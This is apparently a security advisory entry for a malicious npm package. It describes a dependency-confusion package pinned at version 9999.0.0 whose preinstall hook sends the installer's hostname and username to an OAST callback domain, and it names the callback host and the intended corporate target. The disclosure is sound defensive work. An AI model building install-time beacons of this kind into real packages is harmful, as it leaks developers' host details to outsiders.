MAL-2026-5522

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (edd5d007da2de0a07fc1a0d999cccbf71a748627c82c9b2000d161eb248a5a0f) package.json declares a `preinstall` hook that runs an inline `node -e` script reading `os.hostname()` and `os.userInfo().username` and transmitting them via HTTPS GET (and a DNS lookup) to `d8kn5vlt5p5h1j34mbcgbx1nffwjobfoh.oast.fun`, an interactsh/OAST callback subdomain not controlled by the installer. The hook fires automatically on `npm install`, with no opt-out. The package is published under the `@orion-design-system` scope at version `9999.0.0` — the canonical dependency-confusion bait version — and the README names Cloud Imperium Games / Roberts Space Industries as the intended target, confirming the package is positioned to be resolved over a private internal package of the same name. Any installer whose resolver picks the public version (intentionally or via misconfiguration) leaks host identifiers to a third-party collection endpoint on install. The `9999.0.0` version pin combined with the scope-targeted README and unconditional install-time beacon places this firmly in the active-attack / dependency-confusion-exfil pattern, regardless of any `research` framing.